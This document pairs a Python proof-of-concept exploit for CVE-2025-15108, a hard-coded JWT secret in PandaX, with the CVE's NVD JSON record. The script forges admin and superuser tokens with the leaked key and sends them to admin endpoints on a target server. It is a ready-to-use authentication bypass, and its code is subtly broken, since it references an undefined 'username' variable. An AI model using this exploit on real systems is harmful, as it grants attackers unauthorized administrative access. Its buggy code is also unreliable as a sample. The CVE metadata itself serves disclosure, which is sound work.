CVE-2025-15108

# CVE-2025-15108 PoC - JWT Secret Hard-coded Key Exploitation # This PoC demonstrates how to exploit the hard-coded JWT secret vulnerability import jwt import requests import json from datetime import datetime, timedelta # Hard-coded JWT secret from config.yml (obtained from source code) # The actual key value needs to be extracted from the vulnerable config.yml file JWT_SECRET = "extracted_hard_coded_key_from_config" # Replace with actual key TARGET_URL = "http://target-server.com/api" def create_fake_jwt_token(username="admin", roles=["admin"]): """Generate a fake JWT token with custom claims""" payload = { "sub": username, "roles": roles, "iat": datetime.utcnow(), "exp": datetime.utcnow() + timedelta(days=7), "iss": "PandaX", "aud": "PandaX-API" } # Sign the token with the hard-coded secret token = jwt.encode(payload, JWT_SECRET, algorithm="HS256") return token def exploit(target_url, fake_token): """Send the fake token to the target API""" headers = { "Authorization": f"Bearer {fake_token}", "Content-Type": "application/json" } # Try to access protected endpoints endpoints = ["/api/admin/users", "/api/admin/config", "/api/protected"] for endpoint in endpoints: try: response = requests.get(f"{target_url}{endpoint}", headers=headers) print(f"[+] Request to {endpoint}: Status {response.status_code}") if response.status_code == 200: print(f" [!] Successfully authenticated as {username}!") print(f" Response: {response.text[:200]}") except Exception as e: print(f"[-] Error accessing {endpoint}: {e}") if __name__ == "__main__": # Generate fake admin token fake_token = create_fake_jwt_token("admin", ["admin", "superuser"]) print(f"[*] Generated fake JWT token: {fake_token}") # Attempt exploitation exploit(TARGET_URL, fake_token)

{"cve": {"id": "CVE-2025-15108", "sourceIdentifier": "[email protected]", "published": "2025-12-27T17:15:47.033", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in PandaXGO PandaX up to fb8ff40f7ce5dfebdf66306c6d85625061faf7e5. This affects an unknown function of the file config.yml of the component JWT Secret Handler. The manipulation of the argument key results in use of hard-coded cryptographic key\r . The attack may be performed from remote. This attack is characterized by high complexity. The exploitability is reported as difficult. The exploit is now public and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-320"}, {"lang": "en", "value": "CWE-321"}]}], "references": [{"url": "https://github.com/PandaXGO/PandaX/issues/9", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.338479", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.338479", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.711519", "source": "[email protected]"}]}}